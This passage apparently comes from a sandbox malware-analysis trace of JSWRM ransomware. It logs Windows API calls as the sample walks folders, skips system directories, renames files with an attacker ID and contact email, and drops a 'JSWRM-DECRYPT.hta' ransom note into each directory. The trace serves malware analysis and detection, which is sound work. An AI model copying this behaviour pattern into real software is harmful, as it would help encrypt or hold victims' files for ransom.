hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0068.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0068.045] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.045] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=9958860930637664) returned 0 [0068.045] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e8 [0068.045] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24f1e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24f1e8, lpNumberOfBytesRead=0x345e534*=0x0, lpOverlapped=0x0) returned 0 [0068.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e8 | out: hHeap=0x1e0000) returned 1 [0068.045] CloseHandle (hObject=0xffffffff) returned 1 [0068.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0068.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0068.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0068.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x21fab8 [0068.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ecb8 [0068.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21fab8 | out: hHeap=0x1e0000) returned 1 [0068.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.046] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0068.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0068.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0068.046] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f37fbb5, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f37fbb5, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f37fbb5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.046] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.046] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.046] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.046] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.046] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.046] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.046] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.046] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.046] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.046] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.047] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0068.047] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.047] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0068.047] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x21fab8 [0068.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0068.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0068.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0068.047] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f37fbb5, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f37fbb5, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f37fbb5, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0068.047] FindClose (in: hFindFile=0x231d00 | out: hFindFile=0x231d00) returned 1 [0068.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21fab8 | out: hHeap=0x1e0000) returned 1 [0068.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0068.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0068.048] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x0, dwReserved1=0x0, cFileName="insert.xml", cAlternateFileName="")) returned 1 [0068.048] lstrcmpiW (lpString1="insert.xml", lpString2=".") returned 1 [0068.048] lstrcmpiW (lpString1="insert.xml", lpString2="..") returned 1 [0068.048] lstrcmpiW (lpString1="insert.xml", lpString2="...") returned 1 [0068.048] lstrcmpiW (lpString1="insert.xml", lpString2="windows") returned -1 [0068.048] lstrcmpiW (lpString1="insert.xml", lpString2="recovery") returned -1 [0068.048] lstrcmpiW (lpString1="insert.xml", lpString2="perflogs") returned -1 [0068.048] lstrcmpiW (lpString1="insert.xml", lpString2="documents and settings") returned 1 [0068.048] lstrcmpiW (lpString1="insert.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.048] lstrcmpiW (lpString1="insert.xml", lpString2="system volume information") returned -1 [0068.048] lstrcmpiW (lpString1="insert.xml", lpString2="msocache") returned -1 [0068.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0068.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="insert.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="insert.xml", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="insert.xml", lpUsedDefaultChar=0x0) returned 10 [0068.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0068.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0068.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="insert.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="insert.xml", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="insert.xml", lpUsedDefaultChar=0x0) returned 10 [0068.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0068.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0068.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0068.049] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.049] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10076646113792992) returned 0 [0068.049] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.050] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.050] CloseHandle (hObject=0xffffffff) returned 1 [0068.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0068.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0068.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0068.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0068.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0068.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0068.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.050] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0068.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0068.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0068.051] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f30d53a, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f30d53a, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f30d53a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.051] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.051] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.051] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.051] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.051] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.051] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.051] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.051] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.051] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.051] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0068.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0068.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.051] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa063932e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a354279, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="keypad", cAlternateFileName="")) returned 1 [0068.051] lstrcmpiW (lpString1="keypad", lpString2=".") returned 1 [0068.051] lstrcmpiW (lpString1="keypad", lpString2="..") returned 1 [0068.051] lstrcmpiW (lpString1="keypad", lpString2="...") returned 1 [0068.052] lstrcmpiW (lpString1="keypad", lpString2="windows") returned -1 [0068.052] lstrcmpiW (lpString1="keypad", lpString2="recovery") returned -1 [0068.052] lstrcmpiW (lpString1="keypad", lpString2="perflogs") returned -1 [0068.052] lstrcmpiW (lpString1="keypad", lpString2="documents and settings") returned 1 [0068.052] lstrcmpiW (lpString1="keypad", lpString2="$RECYCLE.BIN") returned 1 [0068.052] lstrcmpiW (lpString1="keypad", lpString2="system volume information") returned -1 [0068.052] lstrcmpiW (lpString1="keypad", lpString2="msocache") returned -1 [0068.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0068.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0068.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0068.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0068.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0068.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0068.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0068.052] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\jswrm-decrypt.hta")) returned 0xffffffff [0068.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0068.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0068.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1e0 [0068.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0068.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffb0 [0068.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0068.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0068.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0068.053] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0068.053] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.053] WriteFile (in: hFile=0x458, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0068.054] CloseHandle (hObject=0x458) returned 1 [0068.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0068.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffb0 | out: hHeap=0x1e0000) returned 1 [0068.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0068.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0068.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0068.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0068.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0068.055] 